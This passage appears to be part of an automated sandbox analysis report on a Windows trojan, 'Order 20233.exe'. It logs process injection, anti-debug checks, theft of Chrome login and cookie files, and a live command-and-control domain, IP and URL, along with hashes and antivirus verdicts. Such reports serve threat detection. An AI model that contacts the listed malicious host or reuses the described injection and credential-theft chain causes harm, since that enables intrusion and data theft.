        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D7794 mov eax, dword ptr fs:[00000030h]17_2_018D7794
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018937F5 mov eax, dword ptr fs:[00000030h]17_2_018937F5
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0188A70E mov eax, dword ptr fs:[00000030h]17_2_0188A70E
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0188A70E mov eax, dword ptr fs:[00000030h]17_2_0188A70E
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0187F716 mov eax, dword ptr fs:[00000030h]17_2_0187F716
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018EFF10 mov eax, dword ptr fs:[00000030h]17_2_018EFF10
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018EFF10 mov eax, dword ptr fs:[00000030h]17_2_018EFF10
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0192070D mov eax, dword ptr fs:[00000030h]17_2_0192070D
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0192070D mov eax, dword ptr fs:[00000030h]17_2_0192070D
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01854F2E mov eax, dword ptr fs:[00000030h]17_2_01854F2E
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01854F2E mov eax, dword ptr fs:[00000030h]17_2_01854F2E
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0188E730 mov eax, dword ptr fs:[00000030h]17_2_0188E730
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0186EF40 mov eax, dword ptr fs:[00000030h]17_2_0186EF40
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0186FF60 mov eax, dword ptr fs:[00000030h]17_2_0186FF60
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01928F6A mov eax, dword ptr fs:[00000030h]17_2_01928F6A
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018EFE87 mov eax, dword ptr fs:[00000030h]17_2_018EFE87
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018D46A7 mov eax, dword ptr fs:[00000030h]17_2_018D46A7
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01920EA5 mov eax, dword ptr fs:[00000030h]17_2_01920EA5
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01920EA5 mov eax, dword ptr fs:[00000030h]17_2_01920EA5
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01920EA5 mov eax, dword ptr fs:[00000030h]17_2_01920EA5
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01928ED6 mov eax, dword ptr fs:[00000030h]17_2_01928ED6
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018836CC mov eax, dword ptr fs:[00000030h]17_2_018836CC
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01898EC7 mov eax, dword ptr fs:[00000030h]17_2_01898EC7
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0190FEC0 mov eax, dword ptr fs:[00000030h]17_2_0190FEC0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018676E2 mov eax, dword ptr fs:[00000030h]17_2_018676E2
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018816E0 mov ecx, dword ptr fs:[00000030h]17_2_018816E0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0185C600 mov eax, dword ptr fs:[00000030h]17_2_0185C600
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0185C600 mov eax, dword ptr fs:[00000030h]17_2_0185C600
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0185C600 mov eax, dword ptr fs:[00000030h]17_2_0185C600
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01888E00 mov eax, dword ptr fs:[00000030h]17_2_01888E00
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0188A61C mov eax, dword ptr fs:[00000030h]17_2_0188A61C
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0188A61C mov eax, dword ptr fs:[00000030h]17_2_0188A61C
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01911608 mov eax, dword ptr fs:[00000030h]17_2_01911608
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0185E620 mov eax, dword ptr fs:[00000030h]17_2_0185E620
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0190FE3F mov eax, dword ptr fs:[00000030h]17_2_0190FE3F
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]17_2_01867E41
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]17_2_01867E41
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]17_2_01867E41
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]17_2_01867E41
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]17_2_01867E41
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_01867E41 mov eax, dword ptr fs:[00000030h]17_2_01867E41
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0191AE44 mov eax, dword ptr fs:[00000030h]17_2_0191AE44
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0191AE44 mov eax, dword ptr fs:[00000030h]17_2_0191AE44
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0186766D mov eax, dword ptr fs:[00000030h]17_2_0186766D
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]17_2_0187AE73
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]17_2_0187AE73
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]17_2_0187AE73
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]17_2_0187AE73
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_0187AE73 mov eax, dword ptr fs:[00000030h]17_2_0187AE73
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Code function: 17_2_018999A0 NtCreateSection,LdrInitializeThunk, 17_2_018999A0
        Source: C:\Users\user\Desktop\Order 20233.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\explorer.exe Network Connect: 213.239.221.71 80
        Source: C:\Windows\explorer.exe Domain query: www.ahmedo.ch
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 1310000
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Order 20233.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000
        Source: C:\Users\user\Desktop\Order 20233.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 401000
        Source: C:\Users\user\Desktop\Order 20233.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 11DF008
        Source: C:\Users\user\Desktop\Order 20233.exe Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Thread APC queued: target process: C:\Windows\explorer.exe
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Thread register set: target process: 3452
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe Thread register set: target process: 3452
        Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 3452
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
        Source: C:\Users\user\Desktop\Order 20233.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
        Source: explorer.exe, 00000014.00000000.312817573.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.380769672.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.353276802.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
        Source: explorer.exe, 00000014.00000000.312817573.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.323500035.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.369946324.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000014.00000000.312817573.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.380769672.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.353276802.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: explorer.exe, 00000014.00000000.380301258.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.311808218.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
        Source: explorer.exe, 00000014.00000000.312817573.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.380769672.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.353276802.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\Order 20233.exe Queries volume information: C:\Users\user\Desktop\Order 20233.exe VolumeInformation
        Source: C:\Users\user\Desktop\Order 20233.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match File source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\mstsc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Source: C:\Windows\SysWOW64\mstsc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\mstsc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\mstsc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\mstsc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\mstsc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\mstsc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

        Remote Access Functionality

        Source: Yara match File source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | 1 Shared Modules | Path Interception | 712 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 712 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 13 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 21 Obfuscated Files or Information | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

        [Behavior graph, ID 780222 (Sample: Order 20233.exe, Startdate: 08/01/2023, Architecture: WINDOWS, Score: 100). Order 20233.exe drops C:\Users\user\AppData\...\Order 20233.exe.log and starts AddInProcess32.exe, aspnet_compiler.exe, AddInProcess.exe and 7 other processes; AddInProcess32.exe injects into explorer.exe; explorer.exe connects to www.ahmedo.ch (213.239.221.71, 49698, 80, HETZNER-ASDE, Germany) and starts mstsc.exe.]

        Source | Detection | Scanner | Label | Link
        Order 20233.exe | 51% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles |
        Order 20233.exe | 40% | Virustotal | | Browse

        No Antivirus matches

        Source | Detection | Scanner | Label | Link | Download
        17.0.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File

        Source | Detection | Scanner | Label | Link
        www.ahmedo.ch | 4% | Virustotal | | Browse
        iamme-label.com | 9% | Virustotal | | Browse
        www.iamme-label.com | 3% | Virustotal | | Browse

        Source | Detection | Scanner | Label | Link
        https://www.sysinternals.com0 | 0% | URL Reputation | safe |
        http://www.ahmedo.ch/dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w== | 100% | Avira URL Cloud | malware |
        www.ahmedo.ch/dcn0/ | 10% | Virustotal | | Browse
        www.ahmedo.ch/dcn0/ | 100% | Avira URL Cloud | malware |

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        www.ahmedo.ch | 213.239.221.71 | true | true | | unknown
        iamme-label.com | 81.169.145.80 | true | false | | unknown
        www.iamme-label.com | unknown | unknown | true | | unknown

        Name | Malicious | Antivirus Detection | Reputation
        www.ahmedo.ch/dcn0/ | true | 10%, Virustotal, Browse; Avira URL Cloud: malware | low
        http://www.ahmedo.ch/dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w== | true | Avira URL Cloud: malware | unknown

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://ac.ecosia.org/autocomplete?q= | 4184-48M.21.dr | false | | high
        https://search.yahoo.com?fr=crmas_sfp | mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | false | | high
        https://duckduckgo.com/chrome_newtab | mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | false | | high
        https://duckduckgo.com/ac/?q= | 4184-48M.21.dr | false | | high
        https://www.google.com/images/branding/product/ico/googleg_lodp.ico | mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | false | | high
        https://www.sysinternals.com0 | Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://search.yahoo.com?fr=crmas_sfpf | mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | false | | high
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 4184-48M.21.dr | false | | high
        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | false | | high
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 4184-48M.21.dr | false | | high
        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | false | | high
                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            213.239.221.71 | www.ahmedo.ch | Germany | | 24940 | HETZNER-ASDE | true
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:780222
                            Start date and time:2023-01-08 16:21:13 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Order 20233.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:23
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winEXE@22/2@2/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 33.5% (good quality ratio 29.1%)
                            • Quality average: 71.4%
                            • Quality standard deviation: 33.6%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 56
                            • Number of non-executed functions: 132
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                            • Not all processes were analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            No context
                            No context
                            Process:C:\Users\user\Desktop\Order 20233.exe
                            File Type:CSV text
                            Category:dropped
                            Size (bytes):1510
                            Entropy (8bit):5.381105762964764
                            Encrypted:false
                            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPN+84xpNT:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1f
                            MD5:A3195731DF98BB6BDA4A3DE6D454C33C
                            SHA1:CBEE1CB7EAFDE247618CC50DDE5D9A143732C7E4
                            SHA-256:68DD8AFDE633D8CEF50498ADA0CAD19DEEAF370EB6A01D718D11A499D44E2CCA
                            SHA-512:11DF23E67BBC8A6DA19406BB025FB0F90304B9FD7A2987FC7678E072AE288094A022E9BB8EDB06B102095BFB54BC8C703FD7D646925D6681F256B52354D04DFD
                            Malicious:true
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                            Process:C:\Windows\SysWOW64\mstsc.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                            Category:dropped
                            Size (bytes):94208
                            Entropy (8bit):1.2882898331044472
                            Encrypted:false
                            SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                            MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                            SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                            SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                            SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                            Malicious:false
                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):4.565938948299627
                            TrID:
                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                            • Win64 Executable GUI (202006/5) 46.43%
                            • Win64 Executable (generic) (12005/4) 2.76%
                            • Generic Win/DOS Executable (2004/3) 0.46%
                            • DOS Executable Generic (2002/1) 0.46%
                            File name:Order 20233.exe
                            File size:1827328
                            MD5:cfc3542e983b4a7436dabb73132cbbdb
                            SHA1:c792d80b3667badeef358a872cc5b548d9114151
                            SHA256:614490e3bf7cf0672ecda890e33b49f4f8b80da18333111489284df04ab7d934
                            SHA512:f434b55379dc227f8908b6e25c39a61e699a0b6f90b5d48128f148c6c838ead6d8ec330191d62c409236bc109a95b7fa6a5ad234c99ee57584dc2405490d38fb
                            SSDEEP:24576:0G/gSI7uzvdh53ATay0Lu9fE124K2Gzo/Xyhp4HtNLpTGLRvO4x:dgruLMayJWao/XC6B
                            TLSH:258532203AFE601DF1B3AF795FF4759AA97FFA623B02945D1051034A0A23E41DDD1A3A
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....L.Y.........."...0.................. ....@...... ....................... ......5.....`................................
                            Icon Hash:00828e8e8686b000
                            Entrypoint:0x400000
                            Entrypoint Section:
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x59EE4CED [Mon Oct 23 20:11:25 2017 UTC]
                            TLS Callbacks:
